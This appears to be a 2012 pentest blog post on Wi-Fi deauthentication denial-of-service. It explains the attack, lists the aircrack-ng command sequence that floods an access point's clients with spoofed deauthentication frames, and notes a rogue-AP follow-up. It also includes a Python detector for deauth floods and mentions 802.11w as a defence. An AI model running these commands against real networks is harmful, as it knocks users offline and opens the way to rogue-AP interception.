Thursday, October 4, 2012

DOS on Wireless Networks (wlan jammer)

Deauthentication attack on wireless networks
As a result, every client on the attacked network is kicked off it; put simply, it is a DoS.

The connection between mesh clients and mesh APs is established by the exchange of various frames. After that, a series of management frames such as authentication and association request frames is exchanged. Because these frames are unprotected and sent in the clear, an attacker can spoof them. The attacker sends deauthentication requests with the client's address set as the source, and the mesh AP responds by sending a deauthentication response to the client, so the communication between the client and the AP is halted. Since deauthentication requests are notifications, they cannot be ignored, and the AP acts on them instantly. The attacker can periodically scan all channels and send these spoofed frames to valid clients, terminating their connections.

While deauthenticated, the client may probe for other networks and connect to any other mesh AP in range with good signal strength. The second stage of this DoS can be a rogue AP attack.

# airmon-ng  (lists your wlan interfaces)
# airmon-ng start wlan0  (enables monitor mode on wlan0, which creates mon0)
# airodump-ng mon0  (collects the channel, BSSID and clients of the victim AP)
# airodump-ng -c 11 --bssid 1C:65:9D:B5:D8:C1 mon0  (locks onto the victim AP by channel and BSSID; note that -b is airodump-ng's band filter, the BSSID filter is --bssid)
# aireplay-ng --deauth 100 -c FF:FF:FF:FF:FF:FF -a 1C:65:9D:B5:D8:C1 mon0  (starts sending deauthentication frames; run this in a separate ssh session)
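From the defender's side, the flood above is easy to spot in a monitor-mode capture: a burst of deauthentication frames naming one BSSID, mostly to the broadcast address. The following is an added example, not code from the original post: a parser for 802.11 deauthentication/disassociation frames and a sliding-window counter that alerts on such a burst. The sample frames are constructed inline; the AP MAC is the one used in the commands above, the client MAC and the timestamps are made up.

```python
import struct
from collections import deque
BROADCAST = b"\xff" * 6
DEAUTH, DISASSOC = 12, 10  # 802.11 management-frame subtypes

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_deauth(frame):
    """Return (subtype, dst, src, bssid, reason) for a deauthentication or
    disassociation frame (24-byte MAC header + 2-byte reason code), else None."""
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code, little-endian
    return subtype, dst, src, bssid, reason

def detect_deauth_flood(records, threshold=10, window=1.0):
    """records: iterable of (timestamp, frame_bytes) in capture order. Alerts once
    per BSSID when more than `threshold` deauth/disassoc frames naming that BSSID
    arrive within `window` seconds; a legitimate one-off deauth stays below it."""
    recent, alerts = {}, []
    for ts, frame in records:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        _, dst, _, bssid, reason = parsed
        q = recent.setdefault(bssid, deque())
        q.append((ts, dst == BROADCAST, reason))
        while ts - q[0][0] > window:       # drop frames older than the window
            q.popleft()
        if len(q) > threshold and mac(bssid) not in [a["bssid"] for a in alerts]:
            alerts.append({"bssid": mac(bssid), "first_ts": q[0][0], "count": len(q),
                           "broadcast": sum(1 for _, b, _ in q if b),
                           "reasons": sorted({r for _, _, r in q})})
    return alerts

# Constructed sample capture: the AP MAC is the one from the post, the client MAC
# is made up. One beacon, one legitimate deauth to a client (reason 3), then 100
# broadcast deauths with reason 7 at 10 ms spacing (the flood).
AP = "1c659db5d8c1"
BEACON = bytes.fromhex("80000000" + "ff" * 6 + AP * 2 + "0000" + "00" * 12)
LEGIT_DEAUTH = bytes.fromhex("c0003a01" + "001122334455" + AP * 2 + "1000" + "0300")
FLOOD_DEAUTH = bytes.fromhex("c0003a01" + "ff" * 6 + AP * 2 + "0000" + "0700")

def sample_records():
    return [(0.0, BEACON), (0.5, LEGIT_DEAUTH)] + [(60.0 + i * 0.01, FLOOD_DEAUTH) for i in range(100)]
```

Where 802.11w (Protected Management Frames) is enabled, spoofed deauthentication frames fail their integrity check and are dropped; where it is not, a counter like this on a monitoring interface is the practical way to notice the attack.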


I also decided to write about things other than Checkpoint;
more pentest-related notes will be on this site.

Thx
Cagdas